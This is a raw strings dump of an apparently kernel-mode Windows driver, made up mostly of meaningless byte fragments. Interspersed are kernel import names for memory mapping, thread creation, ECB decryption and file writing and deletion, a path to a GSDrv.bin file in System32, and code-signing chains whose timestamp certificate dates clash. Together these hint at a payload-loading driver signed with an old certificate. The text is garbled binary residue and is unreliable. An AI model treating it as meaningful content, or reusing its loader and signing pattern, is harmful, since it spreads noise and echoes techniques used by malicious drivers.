!This program cannot be run in DOS mode.
h.rdata
H.data
.pdata
h.reloc
STeI<x
\G1e Y!\%
9oZh~g]
H!D$@E3
!V)G\@
4rFJ/_$
W*`^pK
l ED_x
a&mGW?tz'
>'_Nn4
,eQ711
fffffff
xxx????xxx????x
NtCreateThreadEx
NtProtectVirtualMemory
/T'H@~
c*69rS
$AtU (
dSO0t?
;},]Y!
wpf&vh
AD+1Xd
CE3L0J#f=
L8xsI|=
xV'kQ+'
QKxRf0L"
1!)D.O
K ^pBO
*E},}v
=Db)1>"
#5w_,"S
|sW;B:
Q-:<X$Z
d1\NCT
~K6<>$
C0~3>P
Hhu.BW
T)HaS4
^%XN^;FI
yy}hs*
Yk"Zfp
Cr&&k4
m!M`zcb
;vhLae
..8aso
|fy1#i
Gn'aeJ
j.hq h0
"YeD_8
iSw4TKEY
Y#H$Ak
,6tVo[
mr/QFC
s|fA!2
yzu7"*N,
(w>rfV
dke`0@
Eho%:d
=P+F`"
\FB."a!
Jg.xkND^m
w^#*a=
N.Q6LN`w
<A@!S
+4LF}Q
!vEUMM
eo^O8F
WTjvd=
4lZ]Y/
Eb|rBQ
|z*0o
00(@ j
?.NlF]
#K<6M@
ip87/WZ?8c
KU Ev*
\Ve0r6
7eT3?6
#qs_M;0
Yj~/p}
+G%"h`
hBel>,
pal t({
>\:"vG
)-R%Q.
@1!GpH1
?E'o#*%
XZb"\s
hmsGp;
\T3!&_U=:O
v(ebEV
HC/.Nm?
L)]48,
_^Lw!r
&& )Aa
u9Fg2i
;#Y!~Lx
$=M }w
j6QA#/1
U,[l][Z
j6QA#/1
j6QA#/1
z_Q6H!
fubywo]m
WG<v'a
%LhW M_
P_08xc
"Er=0#
<Qi*#}
[#AH6\
D(cah4
w3Zw0%
3bf)_a
n pqk(a
.V,Xib1
<EWHxD\M
{wu$iy
l+{6N1h
|t$e#k
&E>foA
L'rs#gl
bh,2>XY7)RXR
BNh4#5
=Z(#NdNR
:2HTKF
7]7p3~
*}LrF
C{g[=f
R'X'Eu
C'[ a-
(teAV1
K }7iq
_M_$)Hv
JFw}@Q
vOZCs~
Z#=/"jm}
-znBA*
Cn^uMh'
OWI|!|
xDC@^"
qx"bRT
zc^vf5
H{|5(Ol
xbjZ$5{
fT- #l
J{w*4f
c8F5Gm
gK%6$
O*K^;l`
v miOA
@/PU>hJ
`pV4D7
&AypGZ
XkFhB-
q~SQ>]\~
'~Ry,z
;pz/uM
n]jcht{
@+F,-{
M8J}bSg
at )7\
oghkN>z{
#AtiV+o
o+T7 :Q
GmI`o"1
<4~9wE
}O%KUc
{ tKg}
k;=,a"
p_[4'x
*WhQ%\
&Nlp9a
%gu#A2z
[+D {i
S6K)G)
pRg{nDy
f]4m>O
f5nJ-Y
2|d.zk
K.xHd&p
9n`!duK-
}x,B!u
!spAN/gW
1Wc2@7lC9BL
h"n>~E
yd9#/k;y32?
;gwPh~
'd|z:T
c;px+v
sS3w15
H(_c7 T.
PV!}`rO
~3ca<P
g"h{K
'C(P66
|=i~K ^
%E[.[x~
$SzIu
5[$CS}
:'J@>7
s?KN-8
+eC]D
[03VIv6=)}3
ck^Py!
j=RVp|
zFCKr
9!0A7g
e}UAU>{
~,& X}EZ
}Q9{`:b
r'B,iv
a>t^1u
BCryptOpenAlgorithmProvider
BCryptSetProperty
BCryptCloseAlgorithmProvider
BCryptGenerateSymmetricKey
BCryptDecrypt
BCryptDestroyKey
cng.sys
RtlInitUnicodeString
KeWaitForSingleObject
ExAllocatePoolWithTag
ExFreePoolWithTag
MmGetSystemRoutineAddress
MmProtectMdlSystemAddress
MmMapLockedPagesSpecifyCache
MmAllocatePagesForMdlEx
PsCreateSystemThread
ObReferenceObjectByHandle
ObReferenceObjectByHandleWithTag
ObCloseHandle
ObfDereferenceObject
ZwCreateFile
ZwReadFile
ZwWriteFile
ZwClose
MmIsAddressValid
IoCreateFileEx
MmFlushImageSection
ZwDeleteFile
IoFileObjectType
RtlGetVersion
ZwQueryInformationFile
MmGetVirtualForPhysical
KeBugCheckEx
ntoskrnl.exe
Hcy<fA
A^A]fD
CMqYfA
pA]A\_
6VWAVH
L+M0D:
D$ FILE
S;AVAWf
WATAU@:
H!D$@E+
Washington1
Redmond1
Microsoft Corporation1)0'
Microsoft Code Verification Root0
110415201534Z
210415202534Z0~1
PL1"0
Unizeto Technologies S.A.1'0%
Certum Certification Authority1"0
Certum Trusted Network CA0
Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
8\Fv%lM
PL1"0
Unizeto Technologies S.A.1'0%
Certum Certification Authority1"0
Certum Trusted Network CA0
210531064306Z
290917064306Z0
PL1"0
Unizeto Technologies S.A.1'0%
Certum Certification Authority1$0"
Certum Trusted Network CA 20
cyD~Kc$
.4?)LR
http://crl.certum.pl/ctnca.crl0k
http://subca.ocsp-certum.com01
%http://repository.certum.pl/ctnca.cer09
http://www.certum.pl/CPS0
[.&iB<
PL1"0
Unizeto Technologies S.A.1'0%
Certum Certification Authority1$0"
Certum Trusted Network CA 20
210519053218Z
360518053218Z0V1
PL1!0
Asseco Data Systems S.A.1$0"
Certum Code Signing 2021 CA0
3s>c]zu
;U.~v4
http://crl.certum.pl/ctnca2.crl0l
http://subca.ocsp-certum.com02
&http://repository.certum.pl/ctnca2.cer09
http://www.certum.pl/CPS0
Ix(CS+
PL1!0
Asseco Data Systems S.A.1$0"
Certum Code Signing 2021 CA0
230419092809Z
240418092808Z0y1
Jiangsu1
Huaian1
Open Source Developer1'0%
Open Source Developer, Liu Jun0
,http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
http://ccsca2021.ocsp-certum.com05
)http://repository.certum.pl/ccsca2021.cer0
p*M-[th
https://www.certum.pl/CPS0
PL1!0
Asseco Data Systems S.A.1$0"
Certum Code Signing 2021 CA
20240316125222Z
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
230714000000Z
341013235959Z0H1
DigiCert, Inc.1 0
DigiCert Timestamp 20230
Ihttp://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
http://ocsp.digicert.com0X
Lhttp://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
l2|X/gGe
(f*^[0
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
220323000000Z
370322235959Z0c1
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
220801000000Z
311109235959Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
]J<0"0i3
v=Y]Bv
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
~qj#k"
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
240316125222Z0+
/1(0&0$0"
@WhA6o
6E!GS7
(r>s ]W
HBY::#
Washington1
Redmond1
Microsoft Corporation1)0'
Microsoft Code Verification Root0
110222192517Z
210222193517Z0
VeriSign, Inc.1 0
VeriSign Trust Network1:08
1(c) 2006 VeriSign, Inc. - For authorized use only1E0C
<VeriSign Class 3 Public Primary Certification Authority - G50
Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
,N<jPl
3BH8Q:|8
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)101.0,
%VeriSign Class 3 Code Signing 2010 CA0
120820000000Z
130820235959Z0
Jiangsu1
Nanjing1705
.Nanjing xScaler Information Technology Co.,Ltd1>0<
5Digital ID Class 3 - Microsoft Software Validation v21705
.Nanjing xScaler Information Technology Co.,Ltd0
2:V@Zn
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
VeriSign, Inc.1 0
VeriSign Trust Network1:08
1(c) 2006 VeriSign, Inc. - For authorized use only1E0C
<VeriSign Class 3 Public Primary Certification Authority - G50
100208000000Z
200207235959Z0
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)101.0,
%VeriSign Class 3 Code Signing 2010 CA0
https://www.verisign.com/cps0*
https://www.verisign.com/rpa0
[0Y0W0U
image/gif0!0 0
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
VeriSignMPKI-2-80
VeriSign, Inc.1 0
VeriSign Trust Network1;09
2Terms of use at https://www.verisign.com/rpa (c)101.0,
%VeriSign Class 3 Code Signing 2010 CA
'mv@ng
Bb(*y%
20130101000000Z
DigiCert, Inc.1907
0DigiCert Trusted G4 RSA4096 SHA1 TimeStamping CA0
020921000000Z
20520920235959Z0F1
DigiCert1$0"
DigiCert Timestamp 2023 - 10
"YcNW6~
=~^:BgX
+IpCdFE
Ihttp://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
http://ocsp.digicert.com0X
Lhttp://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
DigiCert Inc1
www.digicert.com1)0'
DigiCert Assured ID Root CA - G20
000508000000Z
20600507235959Z0a1
DigiCert, Inc.1907
0DigiCert Trusted G4 RSA4096 SHA1 TimeStamping CA0
DigiCert Inc1
www.digicert.com1)0'
DigiCert Assured ID Root CA - G2
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0
aftWg/
DigiCert, Inc.1907
0DigiCert Trusted G4 RSA4096 SHA1 TimeStamping CA
130101000000Z0#
wTk_ {
4}"z,`
ZwQuerySystemInformation
RtlImageNtHeader
RtlImageDirectoryEntryToData
Microsoft Primitive Provider
ChainingModeECB
ChainingMode
\SystemRoot\System32\GSDrv.bin
\SystemRoot\System32\ntdll.dll
NtOpenFile